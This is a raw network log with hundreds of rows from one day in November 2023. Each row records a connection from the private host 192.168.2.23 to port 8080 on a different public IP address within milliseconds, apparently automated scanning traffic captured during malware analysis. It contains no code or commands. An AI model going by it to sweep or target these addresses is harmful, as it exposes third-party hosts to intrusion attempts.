Nov 22, 2023 08:37:50.414215088 CET	54329	8080	192.168.2.23	62.137.218.151
Nov 22, 2023 08:37:50.414216042 CET	54329	8080	192.168.2.23	62.45.34.144
Nov 22, 2023 08:37:50.414216042 CET	54329	8080	192.168.2.23	85.38.219.171
Nov 22, 2023 08:37:50.414216042 CET	54329	8080	192.168.2.23	62.161.11.115
Nov 22, 2023 08:37:50.414227962 CET	54329	8080	192.168.2.23	95.40.111.7
Nov 22, 2023 08:37:50.414227962 CET	54329	8080	192.168.2.23	31.17.113.68
Nov 22, 2023 08:37:50.414227962 CET	54329	8080	192.168.2.23	95.7.254.9
Nov 22, 2023 08:37:50.414231062 CET	54329	8080	192.168.2.23	62.3.184.19
Nov 22, 2023 08:37:50.414231062 CET	54329	8080	192.168.2.23	62.182.57.233
Nov 22, 2023 08:37:50.414232969 CET	54329	8080	192.168.2.23	31.43.95.129
Nov 22, 2023 08:37:50.414232969 CET	54329	8080	192.168.2.23	62.128.242.153
Nov 22, 2023 08:37:50.414236069 CET	54329	8080	192.168.2.23	94.35.85.140
Nov 22, 2023 08:37:50.414236069 CET	54329	8080	192.168.2.23	85.2.16.10
Nov 22, 2023 08:37:50.414236069 CET	54329	8080	192.168.2.23	31.166.250.170
Nov 22, 2023 08:37:50.414236069 CET	54329	8080	192.168.2.23	95.245.90.115
Nov 22, 2023 08:37:50.414236069 CET	54329	8080	192.168.2.23	95.226.175.0
Nov 22, 2023 08:37:50.414247036 CET	54329	8080	192.168.2.23	95.252.237.239
Nov 22, 2023 08:37:50.414247036 CET	54329	8080	192.168.2.23	85.149.138.71
Nov 22, 2023 08:37:50.414263010 CET	54329	8080	192.168.2.23	94.89.159.225
Nov 22, 2023 08:37:50.414263010 CET	54329	8080	192.168.2.23	62.65.249.161
Nov 22, 2023 08:37:50.414268970 CET	54329	8080	192.168.2.23	85.91.238.35
Nov 22, 2023 08:37:50.414278030 CET	54329	8080	192.168.2.23	31.234.243.242
Nov 22, 2023 08:37:50.414278030 CET	54329	8080	192.168.2.23	31.147.228.101
Nov 22, 2023 08:37:50.414278030 CET	54329	8080	192.168.2.23	31.8.63.136
Nov 22, 2023 08:37:50.414309025 CET	54329	8080	192.168.2.23	95.9.132.36
Nov 22, 2023 08:37:50.414309025 CET	54329	8080	192.168.2.23	95.56.80.201
Nov 22, 2023 08:37:50.414309025 CET	54329	8080	192.168.2.23	95.78.198.247
Nov 22, 2023 08:37:50.414309025 CET	54329	8080	192.168.2.23	94.99.118.150
Nov 22, 2023 08:37:50.414309025 CET	54329	8080	192.168.2.23	94.123.80.90
Nov 22, 2023 08:37:50.414309025 CET	54329	8080	192.168.2.23	31.135.78.221
Nov 22, 2023 08:37:50.414309025 CET	54329	8080	192.168.2.23	95.65.181.156
Nov 22, 2023 08:37:50.414309025 CET	54329	8080	192.168.2.23	31.100.126.118
Nov 22, 2023 08:37:50.414316893 CET	54329	8080	192.168.2.23	94.143.184.175
Nov 22, 2023 08:37:50.414318085 CET	54329	8080	192.168.2.23	85.240.151.49
Nov 22, 2023 08:37:50.414339066 CET	54329	8080	192.168.2.23	31.246.25.131
Nov 22, 2023 08:37:50.414343119 CET	54329	8080	192.168.2.23	95.81.73.56
Nov 22, 2023 08:37:50.414355993 CET	54329	8080	192.168.2.23	85.170.43.221
Nov 22, 2023 08:37:50.414355993 CET	54329	8080	192.168.2.23	62.143.153.229
Nov 22, 2023 08:37:50.414355993 CET	54329	8080	192.168.2.23	31.240.7.2
Nov 22, 2023 08:37:50.414355993 CET	54329	8080	192.168.2.23	85.37.159.208
Nov 22, 2023 08:37:50.414357901 CET	54329	8080	192.168.2.23	62.140.15.176
Nov 22, 2023 08:37:50.414357901 CET	54329	8080	192.168.2.23	95.79.124.183
Nov 22, 2023 08:37:50.414376020 CET	54329	8080	192.168.2.23	94.108.28.185
Nov 22, 2023 08:37:50.414381981 CET	54329	8080	192.168.2.23	95.201.109.154
Nov 22, 2023 08:37:50.414381981 CET	54329	8080	192.168.2.23	62.213.202.73
Nov 22, 2023 08:37:50.414393902 CET	54329	8080	192.168.2.23	62.175.147.27
Nov 22, 2023 08:37:50.414400101 CET	54329	8080	192.168.2.23	85.0.197.149
Nov 22, 2023 08:37:50.414402008 CET	54329	8080	192.168.2.23	94.27.31.236
Nov 22, 2023 08:37:50.414413929 CET	54329	8080	192.168.2.23	31.200.127.109
Nov 22, 2023 08:37:50.414421082 CET	54329	8080	192.168.2.23	94.220.34.11
Nov 22, 2023 08:37:50.414434910 CET	54329	8080	192.168.2.23	95.111.255.194
Nov 22, 2023 08:37:50.414438009 CET	54329	8080	192.168.2.23	85.191.153.81
Nov 22, 2023 08:37:50.414439917 CET	54329	8080	192.168.2.23	95.5.219.30
Nov 22, 2023 08:37:50.414448977 CET	54329	8080	192.168.2.23	95.25.72.207
Nov 22, 2023 08:37:50.414453983 CET	54329	8080	192.168.2.23	85.28.58.234
Nov 22, 2023 08:37:50.414469004 CET	54329	8080	192.168.2.23	95.162.187.9
Nov 22, 2023 08:37:50.414474010 CET	54329	8080	192.168.2.23	94.27.118.58
Nov 22, 2023 08:37:50.414475918 CET	54329	8080	192.168.2.23	94.248.48.36
Nov 22, 2023 08:37:50.414491892 CET	54329	8080	192.168.2.23	94.161.28.49
Nov 22, 2023 08:37:50.414491892 CET	54329	8080	192.168.2.23	85.47.114.15
Nov 22, 2023 08:37:50.414505959 CET	54329	8080	192.168.2.23	95.120.106.141
Nov 22, 2023 08:37:50.414505959 CET	54329	8080	192.168.2.23	85.10.233.149
Nov 22, 2023 08:37:50.414520025 CET	54329	8080	192.168.2.23	62.2.204.103
Nov 22, 2023 08:37:50.414525032 CET	54329	8080	192.168.2.23	31.153.69.77
Nov 22, 2023 08:37:50.414531946 CET	54329	8080	192.168.2.23	94.121.227.57
Nov 22, 2023 08:37:50.414539099 CET	54329	8080	192.168.2.23	95.241.55.231
Nov 22, 2023 08:37:50.414546013 CET	54329	8080	192.168.2.23	31.32.123.20
Nov 22, 2023 08:37:50.414549112 CET	54329	8080	192.168.2.23	94.192.244.36
Nov 22, 2023 08:37:50.414566040 CET	54329	8080	192.168.2.23	94.138.240.82
Nov 22, 2023 08:37:50.414570093 CET	54329	8080	192.168.2.23	94.40.67.129
Nov 22, 2023 08:37:50.414575100 CET	54329	8080	192.168.2.23	85.3.172.133
Nov 22, 2023 08:37:50.414587975 CET	54329	8080	192.168.2.23	95.197.174.205
Nov 22, 2023 08:37:50.414591074 CET	54329	8080	192.168.2.23	94.123.115.182
Nov 22, 2023 08:37:50.414606094 CET	54329	8080	192.168.2.23	85.225.162.246
Nov 22, 2023 08:37:50.414606094 CET	54329	8080	192.168.2.23	62.211.157.150
Nov 22, 2023 08:37:50.414618015 CET	54329	8080	192.168.2.23	31.62.143.231
Nov 22, 2023 08:37:50.414618015 CET	54329	8080	192.168.2.23	31.117.142.20
Nov 22, 2023 08:37:50.414634943 CET	54329	8080	192.168.2.23	62.57.1.142
Nov 22, 2023 08:37:50.414639950 CET	54329	8080	192.168.2.23	85.216.95.193
Nov 22, 2023 08:37:50.414644003 CET	54329	8080	192.168.2.23	85.65.243.101
Nov 22, 2023 08:37:50.414659023 CET	54329	8080	192.168.2.23	95.18.184.59
Nov 22, 2023 08:37:50.414661884 CET	54329	8080	192.168.2.23	85.251.152.237
Nov 22, 2023 08:37:50.414674997 CET	54329	8080	192.168.2.23	95.160.175.15
Nov 22, 2023 08:37:50.414675951 CET	54329	8080	192.168.2.23	85.232.97.13
Nov 22, 2023 08:37:50.414680004 CET	54329	8080	192.168.2.23	85.72.243.203
Nov 22, 2023 08:37:50.414688110 CET	54329	8080	192.168.2.23	85.249.132.236
Nov 22, 2023 08:37:50.414695978 CET	54329	8080	192.168.2.23	62.180.195.203
Nov 22, 2023 08:37:50.414699078 CET	54329	8080	192.168.2.23	85.235.103.126
Nov 22, 2023 08:37:50.414712906 CET	54329	8080	192.168.2.23	95.57.230.187
Nov 22, 2023 08:37:50.414712906 CET	54329	8080	192.168.2.23	62.235.104.246
Nov 22, 2023 08:37:50.414715052 CET	54329	8080	192.168.2.23	94.196.191.21
Nov 22, 2023 08:37:50.414719105 CET	54329	8080	192.168.2.23	85.91.135.113
Nov 22, 2023 08:37:50.414737940 CET	54329	8080	192.168.2.23	62.154.117.217
Nov 22, 2023 08:37:50.414740086 CET	54329	8080	192.168.2.23	95.44.130.230
Nov 22, 2023 08:37:50.414740086 CET	54329	8080	192.168.2.23	95.207.0.229
Nov 22, 2023 08:37:50.414741993 CET	54329	8080	192.168.2.23	95.175.92.155
Nov 22, 2023 08:37:50.414752007 CET	54329	8080	192.168.2.23	85.18.176.87
Nov 22, 2023 08:37:50.414757967 CET	54329	8080	192.168.2.23	94.181.70.173
Nov 22, 2023 08:37:50.414766073 CET	54329	8080	192.168.2.23	94.139.164.163
Nov 22, 2023 08:37:50.414772034 CET	54329	8080	192.168.2.23	62.154.9.148
Nov 22, 2023 08:37:50.414788008 CET	54329	8080	192.168.2.23	62.204.40.134
Nov 22, 2023 08:37:50.414788961 CET	54329	8080	192.168.2.23	31.236.55.218
Nov 22, 2023 08:37:50.414798975 CET	54329	8080	192.168.2.23	85.46.238.201
Nov 22, 2023 08:37:50.414803028 CET	54329	8080	192.168.2.23	95.247.127.51
Nov 22, 2023 08:37:50.414812088 CET	54329	8080	192.168.2.23	31.166.78.204
Nov 22, 2023 08:37:50.414818048 CET	54329	8080	192.168.2.23	62.227.23.83
Nov 22, 2023 08:37:50.414825916 CET	54329	8080	192.168.2.23	31.13.143.73
Nov 22, 2023 08:37:50.414829969 CET	54329	8080	192.168.2.23	94.172.184.31
Nov 22, 2023 08:37:50.414834023 CET	54329	8080	192.168.2.23	85.85.88.242
Nov 22, 2023 08:37:50.414849997 CET	54329	8080	192.168.2.23	95.224.250.10
Nov 22, 2023 08:37:50.414851904 CET	54329	8080	192.168.2.23	85.47.165.73
Nov 22, 2023 08:37:50.414851904 CET	54329	8080	192.168.2.23	85.138.219.166
Nov 22, 2023 08:37:50.414861917 CET	54329	8080	192.168.2.23	31.67.125.161
Nov 22, 2023 08:37:50.414869070 CET	54329	8080	192.168.2.23	85.48.83.66
Nov 22, 2023 08:37:50.414880991 CET	54329	8080	192.168.2.23	31.131.70.29
Nov 22, 2023 08:37:50.414885998 CET	54329	8080	192.168.2.23	95.31.50.12
Nov 22, 2023 08:37:50.414886951 CET	54329	8080	192.168.2.23	94.240.185.141
Nov 22, 2023 08:37:50.414889097 CET	54329	8080	192.168.2.23	94.79.56.7
Nov 22, 2023 08:37:50.414900064 CET	54329	8080	192.168.2.23	85.112.155.86
Nov 22, 2023 08:37:50.414911032 CET	54329	8080	192.168.2.23	62.127.67.177
Nov 22, 2023 08:37:50.414916992 CET	54329	8080	192.168.2.23	85.198.46.169
Nov 22, 2023 08:37:50.414931059 CET	54329	8080	192.168.2.23	85.143.203.129
Nov 22, 2023 08:37:50.414932966 CET	54329	8080	192.168.2.23	62.79.169.3
Nov 22, 2023 08:37:50.414933920 CET	54329	8080	192.168.2.23	85.153.84.22
Nov 22, 2023 08:37:50.414948940 CET	54329	8080	192.168.2.23	95.223.222.210
Nov 22, 2023 08:37:50.414948940 CET	54329	8080	192.168.2.23	85.144.143.202
Nov 22, 2023 08:37:50.414948940 CET	54329	8080	192.168.2.23	62.209.243.87
Nov 22, 2023 08:37:50.414967060 CET	54329	8080	192.168.2.23	31.220.59.62
Nov 22, 2023 08:37:50.414973974 CET	54329	8080	192.168.2.23	31.83.161.73
Nov 22, 2023 08:37:50.414983034 CET	54329	8080	192.168.2.23	31.23.22.39
Nov 22, 2023 08:37:50.414997101 CET	54329	8080	192.168.2.23	62.82.2.194
Nov 22, 2023 08:37:50.414999962 CET	54329	8080	192.168.2.23	62.126.248.214
Nov 22, 2023 08:37:50.414999962 CET	54329	8080	192.168.2.23	95.85.1.86
Nov 22, 2023 08:37:50.415014982 CET	54329	8080	192.168.2.23	94.54.107.31
Nov 22, 2023 08:37:50.415014982 CET	54329	8080	192.168.2.23	62.250.235.192
Nov 22, 2023 08:37:50.415016890 CET	54329	8080	192.168.2.23	95.221.151.227
Nov 22, 2023 08:37:50.415018082 CET	54329	8080	192.168.2.23	62.143.241.15
Nov 22, 2023 08:37:50.415033102 CET	54329	8080	192.168.2.23	94.199.125.83
Nov 22, 2023 08:37:50.415038109 CET	54329	8080	192.168.2.23	62.22.230.146
Nov 22, 2023 08:37:50.415039062 CET	54329	8080	192.168.2.23	85.44.55.160
Nov 22, 2023 08:37:50.415040016 CET	54329	8080	192.168.2.23	85.71.196.246
Nov 22, 2023 08:37:50.415050983 CET	54329	8080	192.168.2.23	31.254.14.184
Nov 22, 2023 08:37:50.415056944 CET	54329	8080	192.168.2.23	94.155.238.173
Nov 22, 2023 08:37:50.415056944 CET	54329	8080	192.168.2.23	95.247.242.198
Nov 22, 2023 08:37:50.415066004 CET	54329	8080	192.168.2.23	95.9.168.103
Nov 22, 2023 08:37:50.415088892 CET	54329	8080	192.168.2.23	31.2.138.148
Nov 22, 2023 08:37:50.415088892 CET	54329	8080	192.168.2.23	95.162.136.247
Nov 22, 2023 08:37:50.415091038 CET	54329	8080	192.168.2.23	95.96.117.190
Nov 22, 2023 08:37:50.415091038 CET	54329	8080	192.168.2.23	31.98.69.128
Nov 22, 2023 08:37:50.415091038 CET	54329	8080	192.168.2.23	94.171.40.166
Nov 22, 2023 08:37:50.415091038 CET	54329	8080	192.168.2.23	31.252.103.209
Nov 22, 2023 08:37:50.415106058 CET	54329	8080	192.168.2.23	85.83.55.3
Nov 22, 2023 08:37:50.415106058 CET	54329	8080	192.168.2.23	95.127.182.73
Nov 22, 2023 08:37:50.415131092 CET	54329	8080	192.168.2.23	94.140.123.48
Nov 22, 2023 08:37:50.415132046 CET	54329	8080	192.168.2.23	94.250.209.88
Nov 22, 2023 08:37:50.415132999 CET	54329	8080	192.168.2.23	62.64.210.44
Nov 22, 2023 08:37:50.415136099 CET	54329	8080	192.168.2.23	62.150.150.152
Nov 22, 2023 08:37:50.415149927 CET	54329	8080	192.168.2.23	85.147.5.13
Nov 22, 2023 08:37:50.415150881 CET	54329	8080	192.168.2.23	94.253.45.101
Nov 22, 2023 08:37:50.415164948 CET	54329	8080	192.168.2.23	95.184.166.153
Nov 22, 2023 08:37:50.415168047 CET	54329	8080	192.168.2.23	95.66.216.250
Nov 22, 2023 08:37:50.415182114 CET	54329	8080	192.168.2.23	62.177.105.44
Nov 22, 2023 08:37:50.415184021 CET	54329	8080	192.168.2.23	31.181.162.116
Nov 22, 2023 08:37:50.415196896 CET	54329	8080	192.168.2.23	31.145.167.168
Nov 22, 2023 08:37:50.415198088 CET	54329	8080	192.168.2.23	85.150.245.37
Nov 22, 2023 08:37:50.415210009 CET	54329	8080	192.168.2.23	94.7.180.27
Nov 22, 2023 08:37:50.415214062 CET	54329	8080	192.168.2.23	94.243.62.137
Nov 22, 2023 08:37:50.415215969 CET	54329	8080	192.168.2.23	85.65.14.66
Nov 22, 2023 08:37:50.415222883 CET	54329	8080	192.168.2.23	62.12.235.230
Nov 22, 2023 08:37:50.415230036 CET	54329	8080	192.168.2.23	95.13.103.71
Nov 22, 2023 08:37:50.415241957 CET	54329	8080	192.168.2.23	62.4.189.223
Nov 22, 2023 08:37:50.415246010 CET	54329	8080	192.168.2.23	31.162.199.221
Nov 22, 2023 08:37:50.415250063 CET	54329	8080	192.168.2.23	94.190.138.25
Nov 22, 2023 08:37:50.415266991 CET	54329	8080	192.168.2.23	62.227.46.243
Nov 22, 2023 08:37:50.415268898 CET	54329	8080	192.168.2.23	94.161.119.54
Nov 22, 2023 08:37:50.415277958 CET	54329	8080	192.168.2.23	62.99.165.66
Nov 22, 2023 08:37:50.415292978 CET	54329	8080	192.168.2.23	85.113.182.182
Nov 22, 2023 08:37:50.415294886 CET	54329	8080	192.168.2.23	85.105.63.173
Nov 22, 2023 08:37:50.415306091 CET	54329	8080	192.168.2.23	85.224.238.161
Nov 22, 2023 08:37:50.415309906 CET	54329	8080	192.168.2.23	62.61.194.117
Nov 22, 2023 08:37:50.415323973 CET	54329	8080	192.168.2.23	95.203.222.168
Nov 22, 2023 08:37:50.415323973 CET	54329	8080	192.168.2.23	62.202.89.177
Nov 22, 2023 08:37:50.415343046 CET	54329	8080	192.168.2.23	94.74.180.150
Nov 22, 2023 08:37:50.415345907 CET	54329	8080	192.168.2.23	95.116.22.144
Nov 22, 2023 08:37:50.415361881 CET	54329	8080	192.168.2.23	31.145.34.233
Nov 22, 2023 08:37:50.415365934 CET	54329	8080	192.168.2.23	62.20.42.217
Nov 22, 2023 08:37:50.415369987 CET	54329	8080	192.168.2.23	95.233.112.131
Nov 22, 2023 08:37:50.415371895 CET	54329	8080	192.168.2.23	85.130.71.217
Nov 22, 2023 08:37:50.415371895 CET	54329	8080	192.168.2.23	95.41.6.15
Nov 22, 2023 08:37:50.415385962 CET	54329	8080	192.168.2.23	62.66.77.231
Nov 22, 2023 08:37:50.415389061 CET	54329	8080	192.168.2.23	95.175.191.142
Nov 22, 2023 08:37:50.415394068 CET	54329	8080	192.168.2.23	31.135.21.120
Nov 22, 2023 08:37:50.415405989 CET	54329	8080	192.168.2.23	94.218.189.137
Nov 22, 2023 08:37:50.415411949 CET	54329	8080	192.168.2.23	31.66.31.2
Nov 22, 2023 08:37:50.415411949 CET	54329	8080	192.168.2.23	85.118.196.252
Nov 22, 2023 08:37:50.415431976 CET	54329	8080	192.168.2.23	85.100.38.248
Nov 22, 2023 08:37:50.415436983 CET	54329	8080	192.168.2.23	94.108.163.60
Nov 22, 2023 08:37:50.415436983 CET	54329	8080	192.168.2.23	62.26.20.74
Nov 22, 2023 08:37:50.415437937 CET	54329	8080	192.168.2.23	95.235.239.106
Nov 22, 2023 08:37:50.415437937 CET	54329	8080	192.168.2.23	62.21.88.49
Nov 22, 2023 08:37:50.415453911 CET	54329	8080	192.168.2.23	85.98.63.92
Nov 22, 2023 08:37:50.415456057 CET	54329	8080	192.168.2.23	62.174.211.180
Nov 22, 2023 08:37:50.415465117 CET	54329	8080	192.168.2.23	95.101.117.149
Nov 22, 2023 08:37:50.415469885 CET	54329	8080	192.168.2.23	62.18.233.21
Nov 22, 2023 08:37:50.415476084 CET	54329	8080	192.168.2.23	95.80.93.219
Nov 22, 2023 08:37:50.415488958 CET	54329	8080	192.168.2.23	31.252.93.159
Nov 22, 2023 08:37:50.415493965 CET	54329	8080	192.168.2.23	94.165.63.146
Nov 22, 2023 08:37:50.415496111 CET	54329	8080	192.168.2.23	85.2.225.243
Nov 22, 2023 08:37:50.415496111 CET	54329	8080	192.168.2.23	85.17.153.250
Nov 22, 2023 08:37:50.415499926 CET	54329	8080	192.168.2.23	94.246.44.9
Nov 22, 2023 08:37:50.415499926 CET	54329	8080	192.168.2.23	31.28.19.188
Nov 22, 2023 08:37:50.415502071 CET	54329	8080	192.168.2.23	31.24.137.80
Nov 22, 2023 08:37:50.415502071 CET	54329	8080	192.168.2.23	31.16.137.30
Nov 22, 2023 08:37:50.415523052 CET	54329	8080	192.168.2.23	31.90.121.186
Nov 22, 2023 08:37:50.415524960 CET	54329	8080	192.168.2.23	94.177.77.100
Nov 22, 2023 08:37:50.415538073 CET	54329	8080	192.168.2.23	62.100.142.202
Nov 22, 2023 08:37:50.415539980 CET	54329	8080	192.168.2.23	62.224.228.247
Nov 22, 2023 08:37:50.415546894 CET	54329	8080	192.168.2.23	62.44.252.223
Nov 22, 2023 08:37:50.415555000 CET	54329	8080	192.168.2.23	85.186.168.183
Nov 22, 2023 08:37:50.415560961 CET	54329	8080	192.168.2.23	85.145.155.107
Nov 22, 2023 08:37:50.415572882 CET	54329	8080	192.168.2.23	85.101.31.27
Nov 22, 2023 08:37:50.415572882 CET	54329	8080	192.168.2.23	85.243.66.33
Nov 22, 2023 08:37:50.415587902 CET	54329	8080	192.168.2.23	62.48.77.12
Nov 22, 2023 08:37:50.415591002 CET	54329	8080	192.168.2.23	85.122.194.92
Nov 22, 2023 08:37:50.415595055 CET	54329	8080	192.168.2.23	85.129.4.14
Nov 22, 2023 08:37:50.415610075 CET	54329	8080	192.168.2.23	94.155.64.125
Nov 22, 2023 08:37:50.415611029 CET	54329	8080	192.168.2.23	31.99.72.84
Nov 22, 2023 08:37:50.415612936 CET	54329	8080	192.168.2.23	31.32.225.218
Nov 22, 2023 08:37:50.415615082 CET	54329	8080	192.168.2.23	95.247.34.237
Nov 22, 2023 08:37:50.415627003 CET	54329	8080	192.168.2.23	95.55.69.159
Nov 22, 2023 08:37:50.415631056 CET	54329	8080	192.168.2.23	62.92.29.244
Nov 22, 2023 08:37:50.415636063 CET	54329	8080	192.168.2.23	31.80.143.36
Nov 22, 2023 08:37:50.415637016 CET	54329	8080	192.168.2.23	85.231.156.240
Nov 22, 2023 08:37:50.415656090 CET	54329	8080	192.168.2.23	62.92.43.220
Nov 22, 2023 08:37:50.415656090 CET	54329	8080	192.168.2.23	95.83.139.5
Nov 22, 2023 08:37:50.415656090 CET	54329	8080	192.168.2.23	31.148.216.124
Nov 22, 2023 08:37:50.415668011 CET	54329	8080	192.168.2.23	95.53.101.157
Nov 22, 2023 08:37:50.415669918 CET	54329	8080	192.168.2.23	94.26.53.190
Nov 22, 2023 08:37:50.415677071 CET	54329	8080	192.168.2.23	95.189.51.72
Nov 22, 2023 08:37:50.415688992 CET	54329	8080	192.168.2.23	94.157.46.220
Nov 22, 2023 08:37:50.415688992 CET	54329	8080	192.168.2.23	85.251.81.151
Nov 22, 2023 08:37:50.415688992 CET	54329	8080	192.168.2.23	94.201.89.7
Nov 22, 2023 08:37:50.415693045 CET	54329	8080	192.168.2.23	85.86.134.142
Nov 22, 2023 08:37:50.415707111 CET	54329	8080	192.168.2.23	85.66.148.224
Nov 22, 2023 08:37:50.415710926 CET	54329	8080	192.168.2.23	31.220.194.249
Nov 22, 2023 08:37:50.415714979 CET	54329	8080	192.168.2.23	85.235.122.19
Nov 22, 2023 08:37:50.415726900 CET	54329	8080	192.168.2.23	94.223.68.75
Nov 22, 2023 08:37:50.415728092 CET	54329	8080	192.168.2.23	94.115.247.11
Nov 22, 2023 08:37:50.415736914 CET	54329	8080	192.168.2.23	31.187.181.208
Nov 22, 2023 08:37:50.415736914 CET	54329	8080	192.168.2.23	62.155.186.2
Nov 22, 2023 08:37:50.415751934 CET	54329	8080	192.168.2.23	94.184.28.130
Nov 22, 2023 08:37:50.415755033 CET	54329	8080	192.168.2.23	31.146.130.213
Nov 22, 2023 08:37:50.415761948 CET	54329	8080	192.168.2.23	62.17.162.37
Nov 22, 2023 08:37:50.415766001 CET	54329	8080	192.168.2.23	94.167.2.234
Nov 22, 2023 08:37:50.415776014 CET	54329	8080	192.168.2.23	95.8.77.150
Nov 22, 2023 08:37:50.415787935 CET	54329	8080	192.168.2.23	62.89.163.216
Nov 22, 2023 08:37:50.415791035 CET	54329	8080	192.168.2.23	85.74.125.48
Nov 22, 2023 08:37:50.415797949 CET	54329	8080	192.168.2.23	85.173.31.39
Nov 22, 2023 08:37:50.415802956 CET	54329	8080	192.168.2.23	95.163.174.124
Nov 22, 2023 08:37:50.415811062 CET	54329	8080	192.168.2.23	85.213.48.237
Nov 22, 2023 08:37:50.415827036 CET	54329	8080	192.168.2.23	94.227.250.167
Nov 22, 2023 08:37:50.415827036 CET	54329	8080	192.168.2.23	85.108.76.225
Nov 22, 2023 08:37:50.415828943 CET	54329	8080	192.168.2.23	95.146.65.26
Nov 22, 2023 08:37:50.415838003 CET	54329	8080	192.168.2.23	85.247.209.32
Nov 22, 2023 08:37:50.415857077 CET	54329	8080	192.168.2.23	95.53.61.209
Nov 22, 2023 08:37:50.415858030 CET	54329	8080	192.168.2.23	31.33.60.209
Nov 22, 2023 08:37:50.415880919 CET	54329	8080	192.168.2.23	85.246.38.187
Nov 22, 2023 08:37:50.415883064 CET	54329	8080	192.168.2.23	31.12.178.218
Nov 22, 2023 08:37:50.415889978 CET	54329	8080	192.168.2.23	31.1.4.222
Nov 22, 2023 08:37:50.415896893 CET	54329	8080	192.168.2.23	31.187.86.203
Nov 22, 2023 08:37:50.415910959 CET	54329	8080	192.168.2.23	85.11.198.189
Nov 22, 2023 08:37:50.415913105 CET	54329	8080	192.168.2.23	85.179.35.24
Nov 22, 2023 08:37:50.415923119 CET	54329	8080	192.168.2.23	95.109.20.80
Nov 22, 2023 08:37:50.415930033 CET	54329	8080	192.168.2.23	85.206.167.164
Nov 22, 2023 08:37:50.415941954 CET	54329	8080	192.168.2.23	85.231.211.214
Nov 22, 2023 08:37:50.415951014 CET	54329	8080	192.168.2.23	95.251.11.75
Nov 22, 2023 08:37:50.415951014 CET	54329	8080	192.168.2.23	94.129.202.110
Nov 22, 2023 08:37:50.415954113 CET	54329	8080	192.168.2.23	94.97.42.197
Nov 22, 2023 08:37:50.415954113 CET	54329	8080	192.168.2.23	95.162.119.159
Nov 22, 2023 08:37:50.415960073 CET	54329	8080	192.168.2.23	94.158.160.129
Nov 22, 2023 08:37:50.415961981 CET	54329	8080	192.168.2.23	85.40.205.32
Nov 22, 2023 08:37:50.415967941 CET	54329	8080	192.168.2.23	94.225.36.86
Nov 22, 2023 08:37:50.415971041 CET	54329	8080	192.168.2.23	85.100.37.106
Nov 22, 2023 08:37:50.415993929 CET	54329	8080	192.168.2.23	62.96.210.76
Nov 22, 2023 08:37:50.415996075 CET	54329	8080	192.168.2.23	95.228.216.27
Nov 22, 2023 08:37:50.415999889 CET	54329	8080	192.168.2.23	31.138.136.167
Nov 22, 2023 08:37:50.416013956 CET	54329	8080	192.168.2.23	95.91.191.196
Nov 22, 2023 08:37:50.416013956 CET	54329	8080	192.168.2.23	31.152.43.100
Nov 22, 2023 08:37:50.416032076 CET	54329	8080	192.168.2.23	62.230.12.130
Nov 22, 2023 08:37:50.416033030 CET	54329	8080	192.168.2.23	95.198.157.177
Nov 22, 2023 08:37:50.416040897 CET	54329	8080	192.168.2.23	85.112.109.86
Nov 22, 2023 08:37:50.416045904 CET	54329	8080	192.168.2.23	85.168.225.154
Nov 22, 2023 08:37:50.416048050 CET	54329	8080	192.168.2.23	95.108.133.157
Nov 22, 2023 08:37:50.416048050 CET	54329	8080	192.168.2.23	95.105.72.223
Nov 22, 2023 08:37:50.416049957 CET	54329	8080	192.168.2.23	95.119.116.60
Nov 22, 2023 08:37:50.416065931 CET	54329	8080	192.168.2.23	31.46.37.127
Nov 22, 2023 08:37:50.416074991 CET	54329	8080	192.168.2.23	94.241.82.92
Nov 22, 2023 08:37:50.416083097 CET	54329	8080	192.168.2.23	62.2.225.56
Nov 22, 2023 08:37:50.416083097 CET	54329	8080	192.168.2.23	31.249.224.107
Nov 22, 2023 08:37:50.416083097 CET	54329	8080	192.168.2.23	85.166.77.114
Nov 22, 2023 08:37:50.416095972 CET	54329	8080	192.168.2.23	95.195.168.94
Nov 22, 2023 08:37:50.416096926 CET	54329	8080	192.168.2.23	62.7.119.29
Nov 22, 2023 08:37:50.416109085 CET	54329	8080	192.168.2.23	94.50.185.101
Nov 22, 2023 08:37:50.416110992 CET	54329	8080	192.168.2.23	62.203.183.237
Nov 22, 2023 08:37:50.416126013 CET	54329	8080	192.168.2.23	85.101.133.49
Nov 22, 2023 08:37:50.416126966 CET	54329	8080	192.168.2.23	95.77.114.190
Nov 22, 2023 08:37:50.416136026 CET	54329	8080	192.168.2.23	62.27.247.38
Nov 22, 2023 08:37:50.416140079 CET	54329	8080	192.168.2.23	62.255.178.189
Nov 22, 2023 08:37:50.416155100 CET	54329	8080	192.168.2.23	62.140.94.2
Nov 22, 2023 08:37:50.416162968 CET	54329	8080	192.168.2.23	62.28.93.170
Nov 22, 2023 08:37:50.416162968 CET	54329	8080	192.168.2.23	62.173.219.217
Nov 22, 2023 08:37:50.416172981 CET	54329	8080	192.168.2.23	31.46.235.158
Nov 22, 2023 08:37:50.416172981 CET	54329	8080	192.168.2.23	95.117.30.53
Nov 22, 2023 08:37:50.416188002 CET	54329	8080	192.168.2.23	31.82.155.3
Nov 22, 2023 08:37:50.416192055 CET	54329	8080	192.168.2.23	85.93.61.189
Nov 22, 2023 08:37:50.416205883 CET	54329	8080	192.168.2.23	62.164.184.13
Nov 22, 2023 08:37:50.416208982 CET	54329	8080	192.168.2.23	94.229.69.222
Nov 22, 2023 08:37:50.416215897 CET	54329	8080	192.168.2.23	85.177.66.166
Nov 22, 2023 08:37:50.416225910 CET	54329	8080	192.168.2.23	85.244.160.44
Nov 22, 2023 08:37:50.416229963 CET	54329	8080	192.168.2.23	95.149.155.134
Nov 22, 2023 08:37:50.416233063 CET	54329	8080	192.168.2.23	31.84.107.231
Nov 22, 2023 08:37:50.416243076 CET	54329	8080	192.168.2.23	95.16.190.253
Nov 22, 2023 08:37:50.416248083 CET	54329	8080	192.168.2.23	31.108.29.114
Nov 22, 2023 08:37:50.416263103 CET	54329	8080	192.168.2.23	95.68.176.126
Nov 22, 2023 08:37:50.416263103 CET	54329	8080	192.168.2.23	95.84.250.120
Nov 22, 2023 08:37:50.416264057 CET	54329	8080	192.168.2.23	31.121.222.220
Nov 22, 2023 08:37:50.416275024 CET	54329	8080	192.168.2.23	62.148.41.113
Nov 22, 2023 08:37:50.416277885 CET	54329	8080	192.168.2.23	94.12.157.203
Nov 22, 2023 08:37:50.416284084 CET	54329	8080	192.168.2.23	85.45.238.246
Nov 22, 2023 08:37:50.416295052 CET	54329	8080	192.168.2.23	85.152.236.2
Nov 22, 2023 08:37:50.416295052 CET	54329	8080	192.168.2.23	62.208.98.187
Nov 22, 2023 08:37:50.416310072 CET	54329	8080	192.168.2.23	31.233.47.220
Nov 22, 2023 08:37:50.416311979 CET	54329	8080	192.168.2.23	31.65.224.204
